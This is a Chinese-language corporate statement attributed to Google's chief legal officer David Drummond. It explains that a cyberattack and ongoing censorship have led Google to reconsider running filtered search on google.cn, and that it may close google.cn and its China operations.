我们已经采取了非常规的手段–与广大的相关人士交流这次攻击的信息,这样做不仅仅是因为这次事件中我们发掘出来的安全和人权问题,更重要的是这件事的核心其实是全世界关于言论自由的讨论.在过去的20年中,中国的经济改革和人民的商业头脑使中国数以亿计的中国人脱离了贫困.在当今世界,这个巨大的国家是整个世界经济发展的中心。

我们在2006年的1月成立了google中国。我们相信与我们必须忍受中国政府的某些内容审查而遭受到的不快相比,无疑让中国人接触到更多的信息和创造一个更加开放的互联网络是更为重要的事情。在当时我们确定了“我们将一直小心关注中国的情况,包括新出台的法律和其他政策制度对我们服务的限制。如果我们认为我们没有能力达到我们提出的目标(指创建一个更加开放的互联网络),我们将会毫不犹豫的考虑是否撤出中国市场”。

这些攻击和审查,同时考虑到这些年对网络上子自由言论的限制,让我们觉得我们应该重新审视我们在中国业务的可行性.我们不愿意再继续忍受对我们google.cn上内容的审查,接下来的几个星期内我们将会与中国政府讨论有关我们是否能够在法律允许的范围内运行一个没有审查和过滤的搜索引擎的可能性。如果失败的话,这久可能意味着我们将要关闭google.cn,以及google中国。

做出这样一个决定是非常困难的一件事,而且我们明白这将会造成深远的后果。有一点要说清楚,这样的决策是由在美国的主管人员们所做出的,并没有到目前为止辛勤工作使google中国如此成功的中国部分员工的参与。我们将会负责任的解决这个棘手的问题。

David Drummond, 企业发展部高级副总裁 首席法务官